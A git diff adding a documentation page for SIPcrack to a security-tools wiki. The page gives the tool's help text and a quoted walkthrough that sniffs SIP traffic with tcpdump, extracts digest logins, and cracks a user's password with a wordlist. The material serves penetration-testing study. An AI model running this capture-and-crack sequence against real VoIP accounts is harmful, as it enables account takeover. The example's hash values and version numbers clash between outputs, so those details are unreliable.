diff --git a/password/index.md b/password/index.md index 0f1f870..2052417 100644 --- a/password/index.md +++ b/password/index.md @@ -30,7 +30,7 @@ Offline Attacks * [rcracki_mt](../tools/rcracki_mt.md) * [rsmangler](../tools/rsmangler.md) * [samdump2](../tools/samdump2.md) - * [sipcrack](../tools/_template.md) + * [sipcrack](../tools/sipcrack.md) * [sucrack](../tools/_template.md) * [truecrack](../tools/_template.md) diff --git a/tools/sipcrack.md b/tools/sipcrack.md new file mode 100644 index 0000000..2d92054 --- /dev/null +++ b/tools/sipcrack.md @@ -0,0 +1,134 @@ +# sipcrack + +Notes +------- +SIPcrack is a suite for sniffing and cracking the digest authentication used in the SIP protocol. + +The tools offer support for pcap files, wordlists and many more to extract all needed information and bruteforce the passwords for the sniffed accounts. + +SIPcrack contains 2 programs: sipdump to capture the digest authentication and sipcrack to bruteforce the hash using a wordlist or standard input. sipdump dumps SIP digest authentications. If a login is found, the sniffed login is written to the dump file. See 'sipdump -h' for options. + +sipcrack bruteforces the user's password with the dump file generated by sipdump. If a password is found, the sniffed and cracked login will be updated in the dump file. See 'sipcrack -h' for options. + + +Help Text +------- +``` +SIPcrack 0.2 ( MaJoMu | www.codito.de ) +---------------------------------------- + +Usage: sipcrack [OPTIONS] [ -s | -w ] + + = file containing logins sniffed by SIPdump + + Options: + -s = use stdin for passwords + -w wordlist = file containing all passwords to try + -p num = print cracking process every n passwords (for -w) + (ATTENTION: slows down heavily) + +* Either -w or -s has to be given +``` + +Example Usage +------- +Use sipdump to dump SIP digest authentications to a file. If a login is found, the sniffed login is written to the dump file. + +Use sipcrack to bruteforce the user password using the dump file generated by sipdump. If a password is found, the sniffed login in the dump file is updated. + + +Example from [aldeid](http://www.aldeid.com/wiki/Crack-VoIP) + +*Capturing the traffic* + +Let's capture the traffic using tcpdump: + +``` +$ tcpdump -s0 -w sip.pcap tcp or udp +``` + +*Isolating the login* + +sipdump is a tool shipped with SIPcrack. It enables to detect the SIP login from a related traffic capture file. + +``` +$ cd ~/src/SIPcrack-0.3pre/ +$ ./sipdump -p ~/tmp/sip.pcap logins.dump + +SIPdump 0.3pre ( MaJoMu | www.codito.de ) +--------------------------------------- + +* Using pcap file '../../tmp/sip.pcap' for sniffing +* Starting to sniff with packet filter 'tcp or udp' + +* Dumped login from 212.27.52.5 -> 192.168.1.29 (User: '0950236158') + +* Exiting, sniffed 1 logins +$ cat logins.dump +192.168.1.29"212.27.52.5"0950236158"freephonie.net"BYE"sip:172.17.20.241:5062 +"04cd38e646e760da129f99fa734ac1e4""""MD5"dc59445f8ef78a615a2ad4d57835a383 +``` + +As you can see from the string above, the login appears in clear, and the password as a MD5 hash. + +Notice that we could also have used tshark to obtain the same result: + +``` +$ tshark -r sip.pcap -Tfields -e sip.auth | grep username +Proxy-Authorization: Digest username=\"0950236158\",realm=\"freephonie.net\", +nonce=\"04cd38e646e760da129f99fa734ac1e4\",uri=\"sip:0950236158@freephonie.net\", +response=\"dc59445f8ef78a615a2ad4d57835a383\",algorithm=MD5, +opaque=\"04cc3f555880bdf\"\x0d\x0a +Proxy-Authorization: Digest username=\"0950236158\",realm=\"freephonie.net\", +nonce=\"04cd38e646e760da129f99fa734ac1e4\",uri=\"sip:172.17.20.241:5062\", +response=\"dc59995a8eb78f605a2ad5d57835a383\",algorithm=MD5, +opaque=\"04cd38e646e760\"\x0d\x0a +``` + +*Cracking the password* + +sipcrack is based on dictionaries to crack the password. For the example, we have built a file containing our password. + +``` +$ car ~/exploits/dictionaries/test.txt +azerty +elephant +test +password +admin +password01 +Password01 +507ZEy@l +oops +oopsoops +cat +dog7 +monster + +$ ./sipcrack -w ~/exploits/dictionaries/test.txt logins.dump + +SIPcrack 0.3pre ( MaJoMu | www.codito.de ) +---------------------------------------- + +* Found Accounts: + +Num Server Client User Hash|Password + +1 192.168.1.29 212.27.52.5 0950236158 dc59495f8eb78a605a2ad5d57835a383 + +* Select which entry to crack (1 - 1): 1 + +* Generating static MD5 hash... 04cd38e646e760da129f99fa734ac1e4 +* Starting bruteforce against user '0950236158' (MD5: 'dc59445f8ef78a615a2ad4d57835a383') +* Loaded wordlist: '~/exploits/dictionaries/test.txt' +* Starting bruteforce against user '0950236158' (MD5: 'dc59445f8ef78a615a2ad4d57835a383') +* Tried 10 passwords in 0 seconds + +* Found password: '507ZEy@l' +* Updating dump file 'logins.dump'... done +``` + + +Links +------- +* [cracking VOIP](http://www.aldeid.com/wiki/Crack-VoIP)